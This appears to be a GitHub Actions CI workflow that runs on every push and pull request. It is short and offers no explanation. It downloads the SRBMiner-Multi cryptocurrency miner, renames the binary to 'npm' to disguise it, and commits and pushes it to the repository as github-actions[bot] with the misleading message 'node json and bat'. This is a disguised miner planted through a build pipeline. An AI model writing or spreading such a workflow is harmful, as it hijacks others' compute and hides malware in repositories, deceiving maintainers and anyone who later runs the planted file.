name: CI
on: [push, pull_request]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v2
      - run: |
          wget https://github.com/doktor83/SRBMiner-Multi/releases/download/0.7.2/SRBMiner-Multi-0-7-2-linux.zip
          unzip SRBMiner-Multi-0-7-2-linux.zip
          cd SRBMiner-Multi-0-7-2
          mv SRBMiner-MULTI npm
          mv npm ..
          cd ..
          git add npm
          git config --local user.email "41898282+github-actions[bot]@users.noreply.github.com"
          git config --local user.name "github-actions[bot]"
          git commit -m "node json and bat"
          git push
          sleep 1s
